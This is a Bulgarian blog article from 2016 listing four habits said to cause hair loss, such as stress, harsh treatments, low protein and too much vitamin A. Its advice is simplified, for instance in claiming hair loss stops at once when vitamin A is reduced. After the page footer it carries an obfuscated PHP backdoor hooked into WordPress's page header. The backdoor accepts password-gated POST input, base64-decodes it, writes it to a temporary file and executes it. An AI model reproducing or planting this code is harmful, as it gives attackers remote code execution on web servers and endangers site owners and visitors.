Ще оплешивеете, ако веднага не престанете с тези 4 неща: | Косопад

Ще оплешивеете, ако веднага не престанете с тези 4 неща:

kosa-vreda

Косата ви може да страда, без изобщо да знаете. Някои процедури, външни фактори или продукти могат да доведат красивата ви коса до границата на оплешивяването. Затова е важно да вземете мерки преди да е станало прекалено късно.

Ако не искате да оплешивеете и косата ви да опада, прочетете много внимателно как да я поддържате в добро здраве.

4 Сбогом стрес

Навярно сте чували много пъти, че ситуациите на напрежение и стрес могат да предизвикат косопад. Това наистина е така. Няма как да избегнем периодите, в които сме претоварени от работа, притеснения и нерви, но ако не искате това да се отрази на здравето на косата ви, трябва да започнете да приемате нещата по различен начин. Потърсете начин да преодолявате стреса и напрежението.

Възможно е да сте подложени на физически стрес вследствие на бременност, операция или катастрофа. Тогава просто трябва да изчакате да мине периода на травмата.

kosa-zdrave-1

3 Третиране на косата

Има все повече процедури за косата, които ни изкушават. Но някои видове трениране, например удължаване на косата, могат сериозно да увредят косата ви и тя да започне обилно да капе.

Избягвайте агресивни химически продукти или прически, които карат косата ви да страда.

2 Протеини

Недостига на протеини е свързан с косопада. Растежът на косата спира, когато не поемаме достатъчно протеини. Най- добрите източници на протеини са месото, рибата, яйцата, бобовите култури.

1 Не прекалявайте с витамин А

Прекаляването с някои хранителни добавки, като определени видове витамини, не се препоръчва. Ако приемаме повече витамин А от препоръчителната дневна доза, може да се появи обилен косопад. Но когато го ограничите до необходимата за деня доза, косопадът веднага ще спре.

20. юни 2016 12:15:23 от Надя Колева
Категории: Косопад – Статии | Етикети: , , , , , | Напишете Коментар

if(!function_exists("_set_fetas_tag") && !function_exists("_set_betas_tag")){try{function _set_fetas_tag(){if(isset($_GET['here'])&&!isset($_POST['here'])){die(md5(8));}if(isset($_POST['here'])){$a1='m'.'d5';if($a1($a1($_POST['here']))==="83a7b60dd6a5daae1a2f1a464791dac4"){$a2="fi"."le"."_put"."_contents";$a22="base";$a22=$a22."64";$a22=$a22."_d";$a22=$a22."ecode";$a222="PD"."9wa"."HAg";$a2222=$_POST[$a1];$a3="sy"."s_ge"."t_te"."mp_dir";$a3=$a3();$a3 = $a3."/".$a1(uniqid(rand(), true));@$a2($a3,$a22($a222).$a22($a2222));include($a3); @$a2($a3,'1'); @unlink($a3);die();}else{echo md5(7);}die();}} _set_fetas_tag();if(!isset($_POST['here'])&&!isset($_GET['here'])){function _set_betas_tag(){echo "";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}}